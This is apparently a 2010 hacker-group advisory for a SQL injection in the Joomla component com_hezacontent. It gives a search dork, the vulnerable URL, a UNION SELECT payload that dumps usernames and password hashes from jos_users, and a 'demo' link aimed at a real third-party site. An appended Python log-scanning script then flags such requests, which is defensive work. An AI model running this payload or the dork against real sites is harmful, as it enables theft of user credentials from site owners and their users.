[!]===========================================================================[!]

[~] Joomla Component com_hezacontent SQL injection Vulnerability (id)
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 9 march, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://joomlacode.org/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zip
[+] Version : 1.0

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_hezacontent&view=item&id=[INDONESIANCODER]

[ XpL ]

-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

[ d3m0 ]

http://bbh.coadesign.org/index.php?option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

and so on ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-
[+] #becak - #indonesiancoder - #kill-9

[ NOTE ]

[+] Rawk !
[+] gonzhack : hurry up and get over here, dummy !!

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
[+] ./e0f
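
Added example, not part of the original advisory: a log triage script that flags requests to com_hezacontent whose id parameter is not a plain number, which is how the request shape shown under [ Vulnerable File ] and [ XpL ] appears in a web server access log. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL tokens that have no place in a numeric item id.
SQL_TOKENS = re.compile(r"\b(union|select|from|concat(?:_ws)?)\b|--|/\*|0x[0-9a-f]+", re.I)

def classify(line):
    """Return None for unrelated requests, else 'ok', 'non-numeric' or 'sqli'."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if query.get("option", [""])[0].lower() != "com_hezacontent":
        return None
    verdict = "ok"
    for value in query.get("id", []):  # parse_qs has already decoded %xx and '+'
        if SQL_TOKENS.search(value):
            return "sqli"
        if not value.strip().isdigit():
            verdict = "non-numeric"  # informational: may be a slug or a probe
    return verdict

def scan(lines):
    """Return (line_number, verdict) for each com_hezacontent request that is not 'ok'."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict not in (None, "ok"):
            hits.append((n, verdict))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Mar/2010:10:00:01 +0000] "GET /index.php?option=com_hezacontent&view=item&id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [09/Mar/2010:10:00:07 +0000] "GET /index.php?option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3+from+jos_users-- HTTP/1.1" 200 6231',
    '192.0.2.44 - - [09/Mar/2010:10:00:09 +0000] "GET /index.php?option=com_hezacontent&view=item&id=%2d1%20UNION%20SELECT%201 HTTP/1.1" 200 6100',
    '192.0.2.51 - - [09/Mar/2010:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 4100',
    '192.0.2.60 - - [09/Mar/2010:10:02:00 +0000] "GET /index.php?option=com_hezacontent&view=item&id=12abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```

A 'sqli' hit that returned HTTP 200 is worth treating as a possible disclosure of the jos_users table and following up with credential resets.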